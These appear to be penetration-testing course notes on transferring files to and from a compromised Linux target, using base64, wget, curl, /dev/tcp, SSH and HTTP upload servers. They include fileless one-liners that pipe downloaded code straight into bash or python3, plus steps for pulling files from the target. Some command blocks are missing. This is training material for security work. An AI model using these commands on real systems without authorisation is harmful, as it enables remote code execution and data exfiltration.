Linux Target

Download Operations (Attacker -> Target)

Base64 Encoding and Decoding

If you have access toa terminal on the target, you can just paste base64 into it and decode it

Web Downloads with Wget and cURL

wget <URL> -O <PATH_OUTPUT>

curl -o <PATH_OUTPUT> <URL>

Fileless

Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.

Fileless Download with cURL

curl <URL> | bash

wget -qO- <URL> | python3

Download with Bash (/dev/tcp)

There may also be situations where none of the well-known file transfer tools are available. As long as Bash version 2.04 or greater is installed (compiled with --enable-net-redirections), the built-in /dev/TCP device file can be used for simple file downloads.

SSH Downloads

On the Attacker machine install and/or enable SSH

On the Target machine:

Upload Operations (Target -> Attacker)

Web Upload

Same method as in Windows by creating an http server that allows uploads:

we can add to it a self-signed certificate:

(The webserver should not host the certificate. We recommend creating a new directory to host the file for our webserver)

Finally let's upload multiple files in one request, from the Target machine run:

We used the option --insecure because we used a self-signed certificate that we trust.

Alternative Web File Transfer Method

Since Linux distributions usually have Python or php installed, starting a web server to transfer files is straightforward. Also, if the server we compromised is a web server, we can move the files we want to transfer to the web server directory and access them from the web page, which means that we are downloading the file from our Pwnbox.

Then download the file normally from the Attacker machine

SCP Upload